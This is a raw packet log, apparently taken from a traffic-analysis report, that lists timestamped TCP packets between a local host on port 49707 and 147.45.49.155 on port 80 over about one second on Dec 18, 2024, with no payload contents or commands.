                                                                    Dec 18, 2024 09:13:05.608437061 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.612427950 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.615899086 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.615933895 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.615945101 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.649046898 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.649100065 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.649133921 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.653126001 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.653143883 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.653176069 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.659574032 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.659626007 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.659668922 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.667953968 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.668004036 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.668072939 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.676419973 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.676465988 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.676547050 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.684735060 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.684788942 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.684890032 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.693131924 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.693178892 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.693233013 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.701654911 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.701704979 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.701721907 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.709860086 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.709923029 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.709995031 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.718334913 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.718357086 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.718381882 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.727987051 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.728037119 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.758224010 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.758256912 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.758300066 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.799479008 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.799515009 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.799559116 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.803596020 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.803719997 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.803766012 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.811969042 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.811997890 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.812041998 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.839462996 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.839560032 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.839613914 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.842921972 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.844113111 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.844166994 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.844223976 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.851054907 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.851108074 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.851238966 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.857934952 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.858014107 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.858048916 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.864732027 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.864779949 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.864823103 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.868221998 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.868266106 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.868338108 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.871735096 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.871829987 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.871841908 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.875237942 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.875299931 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.875339985 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.878693104 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.878758907 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.878804922 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.882219076 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.882236958 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.882297993 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.885684013 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.885771990 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.885796070 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.889343977 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.889394045 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.889448881 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.892724991 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.892777920 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.892780066 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.896212101 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.896261930 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.896272898 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.899672031 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.899746895 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.899831057 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.903158903 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.903177977 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.903213978 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.906749010 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.906816006 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.906871080 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.910155058 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.910192013 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.910229921 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.949362040 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.949428082 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.949439049 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.951037884 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.951107979 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.951255083 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.954562902 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.954704046 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.954758883 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.959160089 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.959223032 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.959240913 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.961369038 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.961435080 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.961499929 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.990451097 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.990513086 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.990524054 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.992173910 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.992283106 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.992357969 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.995634079 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.995726109 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.030479908 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.030586004 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.030631065 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.031737089 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.031852961 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.032047987 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.034288883 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.035192013 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.035254002 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.035414934 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.037785053 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.037833929 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.037869930 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.040241957 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.040301085 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.040348053 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.042829037 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.042932034 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.042984009 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.045345068 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.045399904 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.045434952 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.047875881 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.047923088 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.048015118 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.050466061 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.050529957 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.050662041 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.052938938 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.052984953 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.053020000 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.055510998 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.055555105 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.055562019 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.057986975 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.058053017 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.058092117 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.060548067 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.060590029 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.060595036 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.063100100 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.063152075 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.063232899 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.065763950 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.065819025 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.065820932 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.068116903 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.068156004 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.068245888 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.070631027 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.070683002 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.070743084 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.073205948 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.073249102 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.073288918 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.075819016 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.075881958 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.075910091 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.078147888 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.078264952 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.078268051 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.080593109 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.080668926 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.080745935 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.082921982 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.082967997 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.083014965 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.085253000 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.085303068 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.085309982 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.087219000 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.087275982 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.087348938 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.089241028 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.089288950 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.089314938 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.091092110 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.091223955 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.091252089 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.093100071 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.093144894 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.093313932 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.095189095 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.095213890 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.095257044 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.096972942 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.096990108 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.097018003 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.098875046 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.099061966 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.099104881 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.100826979 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.100862026 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.100869894 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.140211105 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.140259981 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.140348911 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.140780926 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.140827894 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.141216040 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.142750025 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.142836094 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.142853022 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.144665956 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.144735098 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.144736052 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.146641016 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.146699905 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.146891117 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.148550034 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.148596048 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.148600101 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.150497913 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.150557995 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.150589943 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.152431011 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.152544975 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.152668953 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.154400110 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.154448986 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.154464006 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.156297922 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.156384945 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.156434059 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.181586981 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.181646109 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.181663036 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.182447910 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.182549953 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.182594061 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.184406996 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.184451103 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.185100079 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.185203075 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.185321093 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.187024117 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.187131882 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.187177896 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.188958883 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.221649885 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.221704006 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.221751928 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.222376108 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.222418070 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.222570896 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.223768950 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.223815918 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.223905087 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.225193024 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.225245953 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.225290060 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.226680994 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.226732969 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.226758957 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.228111029 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.228189945 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.228224039 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.229552031 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.229634047 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.229645014 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.231030941 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.231075048 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.231108904 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.232420921 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.232469082 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.232592106 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.233817101 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.233910084 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.233925104 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.235249043 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.235291004 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.235299110 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.236685991 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.236731052 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.236771107 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.238157988 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.238209009 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.238321066 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.239602089 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.239645958 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.239646912 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.240993977 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.241035938 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.241091013 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.242439985 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.242487907 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.242553949 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.243885994 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.243932962 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.244076967 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.245320082 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.245371103 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.245410919 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.246762991 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.246810913 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.246850967 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.248172998 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.248229980 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.248289108 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.249701977 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.249744892 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.249749899 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.251025915 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.251089096 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.251174927 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.252496004 CET8049707147.45.49.155192.168.2.5
